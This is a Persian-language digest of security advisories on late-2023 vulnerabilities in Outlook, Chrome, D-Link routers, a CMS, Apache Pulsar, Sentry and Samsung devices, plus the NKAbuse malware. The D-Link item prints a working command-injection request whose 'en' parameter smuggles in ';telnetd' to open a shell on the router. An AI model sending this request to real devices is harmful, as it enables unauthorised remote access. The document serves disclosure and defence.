کشف آسیب‌پذیری در Outlook email service

تاریخ ایجاد

جزئیات فنی دو آسیب‌پذیری امنیتی وصله‌شده در سرویس ایمیل Outlook منتشر شده است. این آسیب‌پذیری‌ها می‌توانند توسط مهاجمان برای اجرای کد از راه دور در سرویس ایمیل Outlook بدون نیاز به تعامل با کاربر مورد بهره‌برداری قرار گیرند. 
این آسیب‌پذیری‌های امنیتی که مایکروسافت آن‌ها را رفع کرده است، عبارتند از:

  • CVE-2023-35384 (امتیاز CVSS: 5.4): این آسیب‌پذیری امکان دور زدن ویژگی امنیتی پلتفرم‌های HTML ویندوز را فراهم می‌کند.
  • CVE-2023-36710 (امتیاز CVSS: 7.8): این آسیب‌پذیری امکان اجرای کد از راه ‌دور در هسته Windows Media Foundation را فراهم می‌کند.

همچنین شرکت مایکروسافت در ماه مارس 2023 یک آسیب‌پذیری امنیتی مهم در Outlook را وصله کرد. این آسیب‌پذیری به مهاجمان اجازه می‌داد تا با دور زدن ویژگی امنیتی پلتفرم‌های HTML ویندوز، کد دلخواه خود را از راه دور در Outlook اجرا کنند. مهاجم می‌تواند از این آسیب‌پذیری جهت دسترسی غیرمجاز به حساب‌های قربانیان در سرورهای Exchange بهره‌برداری کند.
بهره‌برداری از آسیب‌پذیری با شناسه CVE-2023-35384 نیز مانند CVE-2023-29324 می‌تواند برای اجرای کد از راه ‌دور در Outlook بدون نیاز به تعامل کاربر صورت پذیرد. این امر با ارسال یک ایمیل به قربانی از طریق یک پیوند یا پیوست آلوده انجام می‌شود. هنگامی که قربانی روی پیوند یا پیوست کلیک می‌کند، اکسپلویت اجرا می‌شود و کد مخرب را در Outlook بارگذاری می‌کند.
بهره‌برداری آسیب‌پذیری با شناسه CVE-2023-36710 نیز می‌تواند جهت اجرای کد از راه‌دور در Outlook بدون نیاز به تعامل کاربر صورت پذیرد. این امر با ارسال یک ایمیل حاوی فایل صوتی آلوده برای قربانی انجام می‌شود. 

توصیه‌های امنیتی
جهت محافظت در برابر این نقص امنیتی به کاربران توصیه می‌شود اقدامات زیر را اعمال نمایند:
•    سازمان‌ها جهت مسدود کردن اتصالات SMB خروجی به آدرس‌های IP عمومی راه دور باید از microsegmentation استفاده کنند.
•    سازمان‌ها باید NTLM را غیرفعال کنند یا کاربران را به گروه امنیتی کاربران محافظت شده اضافه کنند.
این اقدامات می‌تواند به جلوگیری از بهره‌برداری از آسیب‌پذیری‌های امنیتی در SMB و کاهش خطر سرقت داده‌ها، دسترسی غیرمجاز به حساب‌ها یا اجرای کد مخرب کمک کند.

 

منبع‌خبری:


https://thehackernews.com/2023/12/beware-experts-reveal-new-details-on.html

آسیب پذیری روز صفر در Google Chrome

تاریخ ایجاد

گوگل هشتمین آسیب‌پذیری روز صفر کروم با شناسه CVE-2023-7024  و شدت بالا در سال جاری را در یک به‌روزرسانی امنیتی اضطراری برطرف کرد. برای رفع این آسیب‌پذیری کافی است مرورگر خود را به نسخه‌های وصله‌شده که برای کاربران ویندوز (120.0.6099.129/130) و کاربران مک و لینوکس (120.0.6099.129) می¬باشد، به‌روزرسانی کنید.
آسیب‌پذیری مذکور به دلیل ضعف سرریز بافر پشته (heap buffer overflow) در framework منبع باز WebRTC  رخ داده است. از این Framework برای ارتباطات بدون وقفه یا به اختصار RTC استفاده می‌شود. (به عنوان مثال پخش ویدئو، اشتراک‌گذاری فایل، تلفن VoIP)  از طریق APIهای جاوا اسکریپت).
بسیاری از مرورگرهای وب دیگر مانند موزیلا فایرفاکس، سافاری و مایکروسافت اج برای ارائه Real-Time Communications از این Framework استفاده می‌کنند.

منبع خبر:


https://www.bleepingcomputer.com/news/security/google-fixes-8th-chrome-zero-day-exploited-in-attack…

کشف آسیب‌پذیری بحرانی در ماژول اتوماسیون صنعتی شرکت EFACEC

تاریخ ایجاد

به گفته محققان امنیتی، وجود آسیب‌پذیری به شناسه CVE-2023-50707  و شدت 9.6 در ماژول اتوماسیون صنعتی BCU 500 متعلق به شرکت EFACEC، به مهاجم اجازه می‌دهد تا با ارسال درخواست‌های جعلی، موفق به اجرای حمله منع سرویس (DOS) بر روی ماژول آسیب‌پذیر شود. با توجه به کاربرد این ماژول در زیرساخت‌های حیاتی کشورها، هنوز روش پیاده‌‌‌‌‌‌‌سازی و بهره‌‌‌‌‌‌‌برداری (Exploitation) از این آسیب‌پذیری در دسترس عموم قرار نگرفته است. اما با توجه به نوع این آسیب‌پذیری که با استفاده از روش resource exhaustion منجر به حمله منع سرویس می‌گردد، می‌توان حدس زد که این حمله به دلیل وجود یکی از سه نقص زیر در پیکربندی اشتباه منابع، قابل پیاده‌‌‌‌‌‌‌سازی است.
•    عدم کنترل منابع تخصیص یافته به هر درخواست
•    عدم قطع کردن درخواست‌های ارسالی غیر متعارف به یک منبع قبل از خاموش شدن و از دسترس خارج شدن آن منبع
•    آزاد نشدن ظرفیت پردازش یک منبع بعد از پایان کار محول شده به آن منبع
 

محصولات تحت تأثیر
به گفته تیم پشتیبانی این شرکت، تمام نسخه‌های 4.07 ماژول BCU 500 در معرض این آسیب‌پذیری قرار دارند.

توصیه‌های امنیتی
از کاربران این ماژول‌ها خواسته شده است هر چه سریع‌تر نسخه ماژول‌های خود را به نسخه 4.08 به‌روزرسانی کنند. همچنین از آن‌ها خواسته شده است دسترسی این ماژول‌ها به اینترنت را قطع یا تا حد امکان محدود کنند و نظارت کامل بر درخواست‌های ارسال شده به سمت آن‌ها داشته باشند. به عنوان راهکاری مطمئن از کاربران خواسته شده است که در صورت حیاتی بودن وجود دسترسی به این ماژول‌ها از راه دور یا از طریق شبکه، حتما از سرویس VPN شخصی و مطمئن استفاده کنند. لازم است تا کاربران با توجه به شدت و حیاتی بودن این آسیب‌پذیری (CVSS=9.6) تمام توصیه‌های امنیتی را جدی بگیرند.
 

منابع خبر:


[1] https://nvd.nist.gov/vuln/detail/CVE-2023-50707
[2] https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-02
[3] https://www.efacec.pt/en/contacts/

کشف آسیب‌پذیری در بسته نرم‌افزاری Codelyfe Stupid Simple CMS

تاریخ ایجاد

به تازگی، محققان امنیتی موفق به کشف یک آسیب‌پذیری بحرانی (10) و شناسه CVE-2023-6901 در نرم‌افزارStupid Simple CMS  شده‌اند. Stupid Simple CMS  یک برنامه Open Source است که به کاربران این امکان را می‌دهد که بدون استفاده از پایگاه داده، پستی را در وبلاگشان ایجاد و مدیریت کنند. در واقع این نرم‌افزار برای تسریع و آسان نمودن کار با وبلاگ طراحی شده است. کاربران می‌توانند تنظیمات سایت، محتوای متن، طرح‌بندی و سبک وبلاگ خود را با استفاده از فایل‌های XML و PHP ویرایش کنند. با توجه به این که برای این برنامه کاربردی هیچ وب‌سایت رسمی وجود ندارد، جهت دریافت آن، فقط دو مخزن GitHub با حداقل فایل README. وجود دارد. همچنین هیچ راهنمای نصب، راهنمای کاربر، مرجع   API  یا راهنمای توسعه‌دهنده‌ای برای این برنامه وجود ندارد.
مهاجم می‌تواند یک پست درخواست HTTP مخرب را به فایل /terminal/handle-command.php ارسال کند و دستورات دلخواه سیستم‌عامل را در پارامتر فرمان، تزریق کند. دستورات بدون هیچ گونه اعتبارسنجی یا پاکسازی روی سرور اجرا می‌شوند و مهاجم کنترل کامل سرور را در دست خواهد گرفت.
این آسیب‌پذیری خطری جدی برای امنیت و یکپارچگی وب‌سایتی است که از نرم‌افزار Stupid Simple CMS Plus  استفاده می‌کند. مهاجم می‌تواند از این آسیب‌پذیری جهت سرقت داده‌های حساس، نصب بدافزار، حذف فایل‌ها یا انجام هر گونه اقدام مخرب دیگری بر روی سرور استفاده کند. همچنین این آسیب‌پذیری وب‌سایت را در معرض حملات دیگری مانند منع سرویس، تزریق کد SQL و کد نویسی بین سایتی قرار می‌دهد و می‌تواند سایر برنامه‌ها یا سرویس‌هایی را که روی همان سرور اجرا می‌شوند یا حتی سرورهای دیگر همان شبکه را تحت تأثیر قرار دهد. نمونه این نقص امنیتی در کد زیر قابل مشاهده است.

1


این کد، یک پست درخواست HTTP را به عنوان مقدار پارامتر فرمان به URL هدف ارسال می کند. سرور این دستور را بدون هیچ گونه اعتبارسنجی اجرا می‌کند و خروجی دستور را به عنوان پاسخ برمی‌گرداند. در این حالت، در خروجی نام کاربری که سرور وب را اجرا می‌کند، مانند “www-data” یا “apache”  خواهد بود که نشان می‌دهد مهاجم می‌تواند هر دستوری را روی سرور اجرا کند و نتیجه را برگرداند.
این نقص به دلیل استفاده نادرست از تابع 'shell_exec()' در اسکریپت PHP به وجود می‌آید که دستورات شبیه‌ساز ترمینال را کنترل می‌کند. تابع 'shell_exec()' دستوری را روی سرور اجرا می‌کند و خروجی را به صورت رشته برمی‌گرداند. اسکریپت PHP ورودی کاربر را از پست درخواست می‌گیرد و آن را مستقیماً و بدون هیچ‌گونه اعتبارسنجی به تابع «shell_exec()» ارسال می‌کند. این بدان معناست که ورودی کاربر به عنوان یک فرمان در نظر گرفته و بدون توجه به محتوای آن در سرور اجرا می‌شود.
 

2

محصولات آسیب‌پذیر
تمامی نسخه‌های قبل از 1.1.7 تا  1.2.3نرم‌افزارStupid Simple CMS  تحت تأثیر این آسیب‌پذیری قرار دارند.

توصیه‌های امنیتی
در حال حاضر تنها راه جلوگیری از مخاطرات احتمالی این آسیب‌پذیری، غیرفعال کردن یا حذف ویژگی شبیه‌ساز ترمینال از نرم‌افزار یا استفاده از یک CMS متفاوت است.

منابع خبر:


[1] https://github.com/g1an123/POC/blob/main/README.md
[2] https://vuldb.com/?ctiid_248259=
[3] https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2023-6901

آسیب‌پذیری احراز هویت‌ در Apache Pulsar WebSocket Proxy

تاریخ ایجاد

آسیب‌پذیری احراز هویت نامناسب با شناسه CVE-2023-37544 و شدت بالا 7.5 در Apache شناسایی شده است که امکان اتصال به نقطه پایانی (Endpoint) /pingpong  بدون احراز هویت را برای مهاجم فراهم می‌کند که منجر به انکار سرویس به دلیل پذیرش هر نوع اتصال توسط WebSocket Proxy و انتقال بیش از حد داده به دلیل استفاده نادرست از ویژگی WebSocket ping/pong می‌شود.

محصولات تحت تأثیر
این آسیب‌پذیری Apache Pulsar WebSocket Proxy نسخه‌های 2.8.0 تا *.2.8، 2.9.0 تا *.2.9، 2.10.0 تا 2.10.4، 2.11.0 تا 2.11.1 و 3.0.0 را تحت تأثیر قرار می‌دهد.

توصیه‌های امنیتی
توصیه می‌شود کاربران در اسرع وقت نسخه 2.10 را حداقل به 2.10.5، 2.11 به 2.11.2 و 3.0  را به 3.0.1، ارتقاء دهند. همچنین تمام کاربرانی که از نسخه‌های 2.8، 2.9 و نسخه‌های قبلی استفاده می‌کنند باید آن را به نسخه‌های وصله‌شده بالا ارتقا دهند.

منبع خبر:


https://www.openwall.com/lists/oss-security/2023/12/20/2

آسیب‌پذیری با شدت بالا در sentry-javascript

تاریخ ایجاد

Sentry ابزاری جهت ردیابی خطا (Error Tracking) است که داده‌ها را با استفاده از یک SDK در زمان اجرای برنامه رصد می‌کند و به توسعه‌دهندگان این امکان را می‌دهد تا خیلی سریع، پیوسته و با کارایی بالا، خطاهای احتمالی اپلیکیشن خود را ردیابی و رفع نمایند.
Sentry-Javascript یک Sentry SDK رسمی برای جاوا اسکریپت است. آسیب‌پذیری با شناسه CVE-2023-50249 و CVSS 7.8 یک آسیب‌پذیری با شدت بالا در‌ Sentry-Javascript است که به آسیب‌پذیری ReDoS(Regular Expression Denial of Service) در Astro SDK اشاره دارد. این آسیب‌پذیری در شرایط خاصی به مهاجم اجازه می‌دهد تا زمان‌های محاسباتی بیش از حد روی سرور ایجاد کند که منجر به انکار سرویس (DoS) می‌شود.

محصولات آسیب‌پذیر
نسخه‌های  7.78.0 و 7.86.0 از Astro SDK از Sentry آسیب‌پذیر می‌باشند.
شرایطی که موجب می‌شود برنامه‌هایی که از Sentry's Astro SDK استفاده می‌کنند تحت تأثیر آسیب‌پذیری قرار گیرند به شرح ذیل است:
1.    برنامه از ابزار Sentry استفاده می‌کند:

  •  Sentry Middleware به صورت دستی ثبت شده‌است (نسخه‌های تحت تأثیر: 7.78.0-7.86.0).
  •   Astro در حالت SSR (سرور) یا ترکیبی پیکربندی شده‌ است و همچنین علاوه بر استفاده از نسخه Astro 3.5.0 و جدیدتر، auto instrumentation نیز غیرفعال نشده ‌باشد. (نسخه‌های تحت تاثیر: 7.82.0-7.86.0).

2.    در برنامه، مسیرهایی با حداقل دو پارامتر مسیر پیکربندی شده‌است (به عنوان مثال /foo/[p1]/bar/[p2]).

توصیه‌های امنیتی
وصله‌ی این آسیب‌پذیری در نسخه 7.87.0 ارائه شده ‌است.
از جانب محققان ارتقاء به آخرین نسخه SDK اکیدا توصیه شده ‌است. با این حال، اگر امکان‌پذیر نباشد، مراحل کاهش آسیب‌پذیری به صورت زیر انجام شود:
1.    اگر از Astro 3.5.0 یا جدیدتر استفاده می‌کنید، auto instrumentation را غیرفعال کنید.
2.    میان‌افزار (middle ware) Sentry که به صورت دستی اضافه شده ‌است را حذف کنید (اگر قبلا اضافه شده‌باشد).
پس از این تغییرات، گزارش خطای Sentry همچنان کاربردی خواهد بود، اما برخی از جزئیات مانند تراکنش‌های سمت سرور (و در نتیجه، ردیابی‌های توزیع شده بین کاربر و سرور) حذف خواهند شد. بنابراین همچنان توصیه می‌شود در اسرع وقت به‌روزرسانی به نسخه 7.87.0 انجام شود.

 

منابع خبر:


[1] https://nvd.nist.gov/vuln/detail/CVE-2023-50249
[2] https://github.com/getsentry/sentry-javascript/security/advisories/GHSA-x3v3-8xg8-8v72

کشف بد‌افزار مخرب NKAbuse

تاریخ ایجاد

یک بد‌افزار مخرب چندپلتفرمی با زبان برنامه‌نویسی Go به نام "NKAbuse"، به‌عنوان اولین بد‌افزار مخرب استفاده‌کننده از تکنولوژی NKN (New Kind of Network) جهت تبادل اطلاعات شناسایی شده است و این امر آن را به یک تهدید پنهان برای کاربران تبدیل کرده است.
NKN یک پروتکل نسبتاً جدید از شبکه peer-to-peer غیرمتمرکز است که از تکنولوژی blockchain برای مدیریت منابع و ایجاد یک مدل امن و شفاف در عملیات شبکه استفاده می‌کند. یکی از اهداف NKN بهینه‌سازی سرعت انتقال داده و تاخیر در سراسر شبکه است که با محاسبه مسیرهای کارآمد برای انتقال بسته‌های داده، قابل دستیابی می‌باشد.
 

1

انتقال داده‌ها از طریق NKN 

اصلی‌ترین هدف این بدافزار مخرب، سیستم‌های لینوکسی می‌باشد. حمله NKAbuse با بهره‌گیری از یک آسیب‌پذیری قدیمی در Apache Struts با شناسه CVE-2017-5638 برای حمله به یک شرکت مالی استفاده شده است. اگرچه اکثر حملات به کامپیوترهای لینوکس متمرکز هستند، این نرم‌افزار مخرب می‌تواند دستگاه‌های اینترنت اشیاء را دربرگیرد و از معماری‌های MIPS، ARM و 386 پشتیبانی کند.
NKAbuse  از تکنولوژی NKN به عنوان ابزاری جهت اجرای حملات DDoS (حمله منع سرویس توزیع‌شده) استفاده می‌کند و احتمال دارد به دلیل استفاده از یک پروتکل نوآورانه تشخیص داده نشود. این تهدید از پروتکل عمومی blockchain NKN به عنوان ابزاری جهت انجام یک مجموعه گسترده از حملات flooding به عنوان یک backdoor  در سیستم‌های لینوکس استفاده می‌کند. همچنین، بدافزار با استفاده از پروتکل NKN (New Kind of Network)  با مهاجمان ارتباط برقرار می‌کند تا اطلاعات را ارسال و دریافت کند.
دستورات حمله ارسال شده توسط سرور کنترل و فرمان (C2) ، شامل انواع حملات شبکه از جمله HTTP، TCP، UDP، PING، ICMP و SSL می‌باشد. این حملات با هدف تخریب ساختار شبکه و ایجاد اختلال یا حمله منع سرویس (Denial of Service) انجام می‌شود‌. در جدول زیر لیستی از دستورات حمله آورده شده است:
 

2

دستورات حمله  DDo

بدافزار مذکور علاوه بر قابلیت‌های DDoS، می‌‌تواند به عنوان یک تروجان دسترسی از راه دور (RAT) عمل ‌کند که این امکان را به اپراتورهای خود می‌دهد تا اجرای دستورات، انتقال داده را انجام داده و از صفحه نمایش عکس بگیرند.
 

3

گرفتن عکس که از نمایشگر


منبع خبر:

[1] https://securityaffairs.com/155935/malware/nkabuse-abuses-nkn-technology.html#google_vignette
[2]https://www.bleepingcomputer.com/news/security/new-nkabuse-malware-abuses-nkn-blockchain-for-stealt…

کشف چند آسیب‌پذیری در نرم‌افزار Adobe Experience Manager

تاریخ ایجاد

تاکنون آسیب‌پذیری‌های بسیاری برای نرم‌افزار Adobe Experience Manager(AEM) کشف شده‌ بود که اخیرا ۶ مورد به مجموعه قبلی افزوده شد.
آسیب‌پذیری‌های جدید همگی از نوع stored cross-site-scripting (XSS ذخیره شده) و با شدت متوسط می‌باشند. این آسیب‌پذیری‌ها به یک مهاجم با سطح دسترسی پایین اجازه می‌دهند اسکریپت‌های مخرب را به فیلد‌های آسیب‌پذیر تزریق کند. کد جاوااسکریپت مخرب ممکن است هنگام بازدید از صفحه حاوی فیلد آسیب‌پذیر در مرورگر قربانی اجرا شود.
شناسه‌های 6 آسیب‌پذیری مذکور به صورت زیر هستند:

  • CVE-2023-51457: CVSS 5.4
  •  CVE-2023-51458: CVSS 5.4
  •  CVE-2023-51459: CVSS 5.4
  • CVE-2023-51460: CVSS 5.4
  • CVE-2023-51461: CVSS 5.4
  • CVE-2023-51462: CVSS 5.4

نسخه‌های آسیب‌پذیر
نسخه‌های ماقبل 6.5.18.0 و همچنین نسخه سرویس ابری AEM Cloud Service(CS) نسبت به این نقص‌ها آسیب‌پذیر می‌باشند.

توصیه‌های امنیتی
شرکتAdobe  به کاربران توصیه می‌کند نرم‌افزار خود را به جدیدترین نسخه یعنی نسخه 6.5.19.0‌ و AEM Cloud Service Release 2023.11 به‌روزرسانی کنند. شایان ذکر است کاربرانی که از سرویس ابری (AEM Cloud Service) استفاده می‌کنند به‌طور خودکار به‌روزرسانی‌هایی را دریافت می‌کنند که شامل ویژگی‌های جدید و همچنین رفع اشکال امنیتی و عملکردی است.
 

منابع خبر:


[1] https://nvd.nist.gov/vuln/detail/CVE-2023-51457
[2] https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html

کشف آسیب‌پذیری‌ در D-Link

تاریخ ایجاد

آسیب‌پذیری با شناسه‌ CVE-2023-49004 در D-Link کشف شد که از راه دور امکان اجرای کد دلخواه از طریق یک اسکریپت دستکاری شده برای پارامتر en را فراهم می‌آورد. 

 

2


•    اثبات آسیب‌پذیری


GET /scandir.sgi?action=umnt&en=;telnetd -&path=aaa&where=bbb HTTP/1.0
Host: shareport.local
Cookie: uid=unUFIr9ia
Cache-Control: max-age=0
Sec-Ch-Ua: "Not=A?Brand";v="99", "Chromium";v="118"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close


محصولات تحت تأثیر
این آسیب‌پذیری محصول D-Link DIR-850L v.B1_FW223WWb01 را تحت تأثیر قرار می‌دهد. 

توصیه‌های امنیتی
توصیه می‌شود کاربران در اسرع وقت نسبت به ارتقاء D-Link DIR-850L  به نسخه‌های وصله ‌شده اقدام نمایند.

 

منبع خبر:


https://github.com/ef4tless/vuln/blob/master/iot/DIR-850L/bug1.md

انتشار به‌روزرسانی شرکت سامسونگ

تاریخ ایجاد

شرکت سامسونگ به منظور رفع آسیب‌پذیری در سیستم‌عامل اندروید دستگاه‌های تلفن همراه هوشمند خود، به‌روزرسانی جدیدی تحت عنوان “SMR-DEC-2023” منتشر کرده است. این آسیب‌پذیری‌ها به ترتیب شدتشان عبارتند از:

1.    آسیب‌پذیری‌های با شدت بحرانی:

CVE-2023-21671, CVE-2023-28574, CVE-2023-22388, CVE-2023-33045, CVE-2023-40077, CVE-2023-40076, CVE-2023-40088

2.    آسیب‌پذیری‌های با شدت بالا:

CVE-2023-28469, CVE-2023-20702, CVE-2023-32835, CVE-2023-32834, CVE-2023-33031, CVE-2023-33059, CVE-2023-33055, CVE-2023-33074, CVE-2023-28545, CVE-2023-24852, CVE-2023-33048, CVE-2023-33056, CVE-2023-33047, CVE-2023-33061, CVE-2023-40079, CVE-2023-40089, CVE-2023-40091, CVE-2023-40095, CVE-2023-40096, CVE-2023-40103, CVE-2023-45774, CVE-2023-45777, CVE-2023-21267, CVE-2023-40073, CVE-2023-40092, CVE-2023-40074, CVE-2023-40075, CVE-2023-40078, CVE-2023-40080, CVE-2023-40082, CVE-2023-40084, CVE-2023-40087, CVE-2023-40090, CVE-2023-40097, CVE-2023-45773, CVE-2023-45775, CVE-2023-45776, CVE-2023-35668, CVE-2023-40083, CVE-2023-21394, CVE-2023-40098, CVE-2023-45781, CVE-2023-40094(A-288896339, A-307719731) , CVE-2023-32837, CVE-2023-32832

1.    آسیب‌پذیری‌های با شدت متوسط: 


CVE-2023-45864, CVE-2023-42483, CVE-2023-40081, CVE-2023-32836

در به‌روزرسانی منتشر شده توسط شرکت سامسونگ (Samsung) برای رابط کاربری OneUI، آسیب‌پذیری در بخش‌های Knox، سیستم تشخیص چهره دوربین جلو، AR Emoji، SmartManagerCN، bootloader، dec_mono_audb of libsavsac.so، Knox Guard، HAL در بخش HDCP، libIfaaCa، softsimd، libsavsvc، Smart Clip و Contacts را برطرف ساخت.

منبع خبر: 


https://security.samsungmobile.com/securityUpdate.smsb